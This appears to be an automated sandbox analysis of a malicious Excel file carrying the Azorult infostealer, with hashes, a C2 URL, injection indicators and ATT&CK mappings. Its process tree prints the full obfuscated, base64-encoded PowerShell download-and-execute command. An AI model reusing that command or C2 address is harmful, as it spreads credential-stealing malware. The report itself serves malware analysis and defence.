azorult | b4f58a5e9cc1c3b94f848aeb3830e9e28a38ec98cc6ec3337661d7b17c08e358

General

Target

MUN_2207.xlsb
Size

38KB
MD5

302b089cdad737572251ed036c828168
SHA1

a22de587007bf85f3998b4cdde2e794409ea0c0b
SHA256

b4f58a5e9cc1c3b94f848aeb3830e9e28a38ec98cc6ec3337661d7b17c08e358
SHA512

d52c79b2040d4028a31ca83304a23650e095c5efda67c6e3f0039d0b5bf9c9120825f4d4e89cad2290f582f6f294de3dfd003a0a91ec3eb6b85610dbfceedf25

Score

10^/10

azorult infostealer trojan

Malware Config

Extracted

Family

azorult

C2

http://itthonfiatalon.hu/temp/reo/index.php

Signatures

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	3924	996	cmd.exe	EXCEL.EXE

Downloads MZ/PE file
Suspicious use of SetThreadContext 1 IoCs

Processes:

klpfjg.exe

description pid process target process

PID 2296 set thread context of 2384 2296 klpfjg.exe klpfjg.exe

description	pid	process	target process
PID 2296 set thread context of 2384	2296	klpfjg.exe	klpfjg.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

996 EXCEL.EXE
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exe

pid process

2480 powershell.exe
2480 powershell.exe
2480 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2480 powershell.exe

pid	process
2480	powershell.exe
2480	powershell.exe
2480	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2480	powershell.exe

Suspicious use of SetWindowsHookEx 12 IoCs

Processes:

EXCEL.EXE

pid	process
996	EXCEL.EXE
996	EXCEL.EXE
996	EXCEL.EXE
996	EXCEL.EXE
996	EXCEL.EXE
996	EXCEL.EXE
996	EXCEL.EXE
996	EXCEL.EXE
996	EXCEL.EXE
996	EXCEL.EXE
996	EXCEL.EXE
996	EXCEL.EXE

Suspicious use of WriteProcessMemory 16 IoCs

Processes:

EXCEL.EXEcmd.exepowershell.exeklpfjg.exe

description	pid	process	target process
PID 996 wrote to memory of 3924	996	EXCEL.EXE	cmd.exe
PID 996 wrote to memory of 3924	996	EXCEL.EXE	cmd.exe
PID 3924 wrote to memory of 2480	3924	cmd.exe	powershell.exe
PID 3924 wrote to memory of 2480	3924	cmd.exe	powershell.exe
PID 2480 wrote to memory of 2296	2480	powershell.exe	klpfjg.exe
PID 2480 wrote to memory of 2296	2480	powershell.exe	klpfjg.exe
PID 2480 wrote to memory of 2296	2480	powershell.exe	klpfjg.exe
PID 2296 wrote to memory of 2384	2296	klpfjg.exe	klpfjg.exe
PID 2296 wrote to memory of 2384	2296	klpfjg.exe	klpfjg.exe
PID 2296 wrote to memory of 2384	2296	klpfjg.exe	klpfjg.exe
PID 2296 wrote to memory of 2384	2296	klpfjg.exe	klpfjg.exe
PID 2296 wrote to memory of 2384	2296	klpfjg.exe	klpfjg.exe
PID 2296 wrote to memory of 2384	2296	klpfjg.exe	klpfjg.exe
PID 2296 wrote to memory of 2384	2296	klpfjg.exe	klpfjg.exe
PID 2296 wrote to memory of 2384	2296	klpfjg.exe	klpfjg.exe
PID 2296 wrote to memory of 2384	2296	klpfjg.exe	klpfjg.exe

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\MUN_2207.xlsb"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:996

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C P^oW^eR^S^hE^Ll -E WwBzAHkAcwB0AEUAbQAuAFQAZQB4AFQALgBlAG4AYwBvAGQAaQBuAEcAXQA6ADoAdQBOAEkAYwBvAGQARQAuAGcAZQB0AHMAdABSAGkAbgBnACgAWwBzAHkAUwBUAEUATQAuAEMAbwBOAFYAZQByAFQAXQA6ADoAZgBSAG8AbQBCAEEAcwBFADYANABzAHQAcgBJAG4ARwAoACIAZABBAEIAeQBBAEgAawBBAGUAdwBCAG0AQQBHADgAQQBjAGcAQQBnAEEAQwBnAEEASgBBAEIAcABBAEQAMABBAE0AUQBBADcAQQBDAEEAQQBKAEEAQgBwAEEAQwBBAEEATABRAEIAcwBBAEcAVQBBAEkAQQBBAHgAQQBEAFUAQQBNAEEAQQB3AEEARABBAEEATwB3AEEAZwBBAEMAUQBBAGEAUQBBAHIAQQBDAHMAQQBLAFEAQQBnAEEASABzAEEASgBBAEIAcABBAEMAdwBBAEkAZwBCAGcAQQBHADQAQQBJAGcAQgA5AEEASAAwAEEAWQB3AEIAaABBAEgAUQBBAFkAdwBCAG8AQQBIAHMAQQBmAFEAQQBnAEEARwBZAEEAZABRAEIAdQBBAEcATQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQQBnAEEASABNAEEAYwBBAEIAeABBAEgAUQBBAEkAQQBBAG8AQQBDAEEAQQBKAEEAQgBtAEEASABvAEEAYwBnAEIAMABBAEMAQQBBAEwAQQBBAGcAQQBDAFEAQQBaAFEAQgAzAEEARwBrAEEAYQBBAEEAZwBBAEMAawBBAEkAQQBCADcAQQBFAGsAQQBiAFEAQgBRAEEARQA4AEEAVQBnAEIAMABBAEMAMABBAFQAUQBCAFAAQQBFAFEAQQBkAFEAQgBNAEEARwBVAEEASQBBAEIAaQBBAEcAawBBAGQAQQBCAFQAQQBIAFEAQQBjAGcAQgBoAEEARQA0AEEAYwB3AEIARwBBAEUAVQBBAFUAZwBBADcAQQBBADAAQQBDAGcAQgBUAEEASABRAEEAWQBRAEIAUwBBAEgAUQBBAEwAUQBCAGkAQQBFAGsAQQBkAEEAQgB6AEEASABRAEEAVQBnAEIAQgBBAEUANABBAFUAdwBCAG0AQQBFAFUAQQBjAGcAQQBnAEEAQwAwAEEAVQB3AEIAUABBAEYAVQBBAGMAZwBCAEQAQQBFAFUAQQBJAEEAQQBrAEEARwBZAEEAZQBnAEIAeQBBAEgAUQBBAEkAQQBBAHQAQQBFAFEAQQBSAFEAQgBUAEEARgBRAEEAUwBRAEIAdQBBAEUARQBBAFYAQQBCAHAAQQBHADgAQQBiAGcAQQBnAEEAQwBRAEEAWgBRAEIAMwBBAEcAawBBAGEAQQBBADcAQQBDAEEAQQBTAFEAQgB1AEEASABZAEEAYgB3AEIAcgBBAEcAVQBBAEwAUQBCAEoAQQBIAFEAQQBaAFEAQgB0AEEAQwBBAEEASgBBAEIAbABBAEgAYwBBAGEAUQBCAG8AQQBEAHMAQQBmAFEAQQBOAEEAQQBvAEEAZABBAEIAeQBBAEgAawBBAGUAdwBBAGcAQQBDAEEAQQBKAEEAQgB4AEEARwBvAEEAYgBBAEIAcABBAEgAZwBBAGQAQQBCAHAAQQBHAEkAQQBjAHcAQQA5AEEAQwBRAEEAWgBRAEIATwBBAEgAWQBBAE8AZwBCAFUAQQBFAFUAQQBUAFEAQgBRAEEAQwBzAEEASgB3AEIAYwBBAEcAcwBBAGIAQQBCAHcAQQBHAFkAQQBhAGcAQgBuAEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBADcAQQBBADAAQQBDAGcAQgB6AEEASABBAEEAYwBRAEIAMABBAEMAQQBBAEoAdwBCAG8AQQBIAFEAQQBkAEEAQgB3AEEARABvAEEATAB3AEEAdgBBAEcATQBBAFkAUQBCAHoAQQBHAFUAQQBaAGcAQgB5AEEARwBFAEEAYgBnAEIAcgBBAEMANABBAFkAdwBCAHYAQQBHADAAQQBMAHcAQgAwAEEARwBVAEEAYgBRAEIAdwBBAEMAOABBAFoAUQBCAG4AQQBHAFEAQQBaAHcAQgBvAEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBAGcAQQBDAFEAQQBjAFEAQgBxAEEARwB3AEEAYQBRAEIANABBAEgAUQBBAGEAUQBCAGkAQQBIAE0AQQBPAHcAQQBOAEEAQQBvAEEASQBBAEIAOQBBAEcATQBBAFkAUQBCADAAQQBHAE0AQQBhAEEAQgA3AEEASAAwAEEAIgApACkAfABpAEUAeAA=
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:3924

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PoWeRShELl -E WwBzAHkAcwB0AEUAbQAuAFQAZQB4AFQALgBlAG4AYwBvAGQAaQBuAEcAXQA6ADoAdQBOAEkAYwBvAGQARQAuAGcAZQB0AHMAdABSAGkAbgBnACgAWwBzAHkAUwBUAEUATQAuAEMAbwBOAFYAZQByAFQAXQA6ADoAZgBSAG8AbQBCAEEAcwBFADYANABzAHQAcgBJAG4ARwAoACIAZABBAEIAeQBBAEgAawBBAGUAdwBCAG0AQQBHADgAQQBjAGcAQQBnAEEAQwBnAEEASgBBAEIAcABBAEQAMABBAE0AUQBBADcAQQBDAEEAQQBKAEEAQgBwAEEAQwBBAEEATABRAEIAcwBBAEcAVQBBAEkAQQBBAHgAQQBEAFUAQQBNAEEAQQB3AEEARABBAEEATwB3AEEAZwBBAEMAUQBBAGEAUQBBAHIAQQBDAHMAQQBLAFEAQQBnAEEASABzAEEASgBBAEIAcABBAEMAdwBBAEkAZwBCAGcAQQBHADQAQQBJAGcAQgA5AEEASAAwAEEAWQB3AEIAaABBAEgAUQBBAFkAdwBCAG8AQQBIAHMAQQBmAFEAQQBnAEEARwBZAEEAZABRAEIAdQBBAEcATQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQQBnAEEASABNAEEAYwBBAEIAeABBAEgAUQBBAEkAQQBBAG8AQQBDAEEAQQBKAEEAQgBtAEEASABvAEEAYwBnAEIAMABBAEMAQQBBAEwAQQBBAGcAQQBDAFEAQQBaAFEAQgAzAEEARwBrAEEAYQBBAEEAZwBBAEMAawBBAEkAQQBCADcAQQBFAGsAQQBiAFEAQgBRAEEARQA4AEEAVQBnAEIAMABBAEMAMABBAFQAUQBCAFAAQQBFAFEAQQBkAFEAQgBNAEEARwBVAEEASQBBAEIAaQBBAEcAawBBAGQAQQBCAFQAQQBIAFEAQQBjAGcAQgBoAEEARQA0AEEAYwB3AEIARwBBAEUAVQBBAFUAZwBBADcAQQBBADAAQQBDAGcAQgBUAEEASABRAEEAWQBRAEIAUwBBAEgAUQBBAEwAUQBCAGkAQQBFAGsAQQBkAEEAQgB6AEEASABRAEEAVQBnAEIAQgBBAEUANABBAFUAdwBCAG0AQQBFAFUAQQBjAGcAQQBnAEEAQwAwAEEAVQB3AEIAUABBAEYAVQBBAGMAZwBCAEQAQQBFAFUAQQBJAEEAQQBrAEEARwBZAEEAZQBnAEIAeQBBAEgAUQBBAEkAQQBBAHQAQQBFAFEAQQBSAFEAQgBUAEEARgBRAEEAUwBRAEIAdQBBAEUARQBBAFYAQQBCAHAAQQBHADgAQQBiAGcAQQBnAEEAQwBRAEEAWgBRAEIAMwBBAEcAawBBAGEAQQBBADcAQQBDAEEAQQBTAFEAQgB1AEEASABZAEEAYgB3AEIAcgBBAEcAVQBBAEwAUQBCAEoAQQBIAFEAQQBaAFEAQgB0AEEAQwBBAEEASgBBAEIAbABBAEgAYwBBAGEAUQBCAG8AQQBEAHMAQQBmAFEAQQBOAEEAQQBvAEEAZABBAEIAeQBBAEgAawBBAGUAdwBBAGcAQQBDAEEAQQBKAEEAQgB4AEEARwBvAEEAYgBBAEIAcABBAEgAZwBBAGQAQQBCAHAAQQBHAEkAQQBjAHcAQQA5AEEAQwBRAEEAWgBRAEIATwBBAEgAWQBBAE8AZwBCAFUAQQBFAFUAQQBUAFEAQgBRAEEAQwBzAEEASgB3AEIAYwBBAEcAcwBBAGIAQQBCAHcAQQBHAFkAQQBhAGcAQgBuAEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBADcAQQBBADAAQQBDAGcAQgB6AEEASABBAEEAYwBRAEIAMABBAEMAQQBBAEoAdwBCAG8AQQBIAFEAQQBkAEEAQgB3AEEARABvAEEATAB3AEEAdgBBAEcATQBBAFkAUQBCAHoAQQBHAFUAQQBaAGcAQgB5AEEARwBFAEEAYgBnAEIAcgBBAEMANABBAFkAdwBCAHYAQQBHADAAQQBMAHcAQgAwAEEARwBVAEEAYgBRAEIAdwBBAEMAOABBAFoAUQBCAG4AQQBHAFEAQQBaAHcAQgBvAEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBAGcAQQBDAFEAQQBjAFEAQgBxAEEARwB3AEEAYQBRAEIANABBAEgAUQBBAGEAUQBCAGkAQQBIAE0AQQBPAHcAQQBOAEEAQQBvAEEASQBBAEIAOQBBAEcATQBBAFkAUQBCADAAQQBHAE0AQQBhAEEAQgA3AEEASAAwAEEAIgApACkAfABpAEUAeAA=
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2480

C:\Users\Admin\AppData\Local\Temp\klpfjg.exe
"C:\Users\Admin\AppData\Local\Temp\klpfjg.exe"
4⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2296

C:\Users\Admin\AppData\Local\Temp\klpfjg.exe
"C:\Users\Admin\AppData\Local\Temp\klpfjg.exe"
5⤵
PID:2384

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/996-114-0x00007FF71C6A0000-0x00007FF71FC56000-memory.dmp

Filesize
53.7MB

Download
memory/996-115-0x00007FF861870000-0x00007FF861880000-memory.dmp

Filesize
64KB

Download
memory/996-116-0x00007FF861870000-0x00007FF861880000-memory.dmp

Filesize
64KB

Download
memory/996-117-0x00007FF861870000-0x00007FF861880000-memory.dmp

Filesize
64KB

Download
memory/996-118-0x00007FF861870000-0x00007FF861880000-memory.dmp

Filesize
64KB

Download
memory/996-121-0x00007FF861870000-0x00007FF861880000-memory.dmp

Filesize
64KB

Download
memory/996-122-0x00007FF882280000-0x00007FF88336E000-memory.dmp

Filesize
16.9MB

Download
memory/996-123-0x000001CEE3FC0000-0x000001CEE5EB5000-memory.dmp

Filesize
31.0MB

Download
memory/996-440-0x00007FF861870000-0x00007FF861880000-memory.dmp

Filesize
64KB

Download
memory/996-439-0x00007FF861870000-0x00007FF861880000-memory.dmp

Filesize
64KB

Download
memory/996-438-0x00007FF861870000-0x00007FF861880000-memory.dmp

Filesize
64KB

Download
memory/996-437-0x00007FF861870000-0x00007FF861880000-memory.dmp

Filesize
64KB

Download
memory/2296-407-0x0000000000000000-mapping.dmp

Download
memory/2296-413-0x00000000052B0000-0x00000000052B1000-memory.dmp

Filesize
4KB

Download
memory/2296-416-0x0000000005210000-0x000000000570E000-memory.dmp

Filesize
5.0MB

Download
memory/2296-415-0x0000000005350000-0x0000000005351000-memory.dmp

Filesize
4KB

Download
memory/2296-414-0x0000000005160000-0x0000000005161000-memory.dmp

Filesize
4KB

Download
memory/2296-442-0x0000000001000000-0x0000000001022000-memory.dmp

Filesize
136KB

Download
memory/2296-441-0x0000000000E20000-0x0000000000E88000-memory.dmp

Filesize
416KB

Download
memory/2296-409-0x0000000000720000-0x0000000000721000-memory.dmp

Filesize
4KB

Download
memory/2296-411-0x0000000005170000-0x0000000005171000-memory.dmp

Filesize
4KB

Download
memory/2296-412-0x0000000005710000-0x0000000005711000-memory.dmp

Filesize
4KB

Download
memory/2296-417-0x0000000008720000-0x000000000873B000-memory.dmp

Filesize
108KB

Download
memory/2384-443-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/2384-444-0x000000000041A1F8-mapping.dmp

Download
memory/2384-445-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/2480-278-0x000001D74CCB0000-0x000001D74CCB1000-memory.dmp

Filesize
4KB

Download
memory/2480-277-0x000001D74CD63000-0x000001D74CD65000-memory.dmp

Filesize
8KB

Download
memory/2480-275-0x000001D74CD60000-0x000001D74CD62000-memory.dmp

Filesize
8KB

Download
memory/2480-269-0x0000000000000000-mapping.dmp

Download
memory/2480-283-0x000001D74CF70000-0x000001D74CF71000-memory.dmp

Filesize
4KB

Download
memory/2480-402-0x000001D74CD68000-0x000001D74CD69000-memory.dmp

Filesize
4KB

Download
memory/2480-401-0x000001D74CD66000-0x000001D74CD68000-memory.dmp

Filesize
8KB

Download
memory/2480-393-0x000001D74D010000-0x000001D74D011000-memory.dmp

Filesize
4KB

Download
memory/2480-354-0x000001D74CD00000-0x000001D74CD01000-memory.dmp

Filesize
4KB

Download
memory/3924-264-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads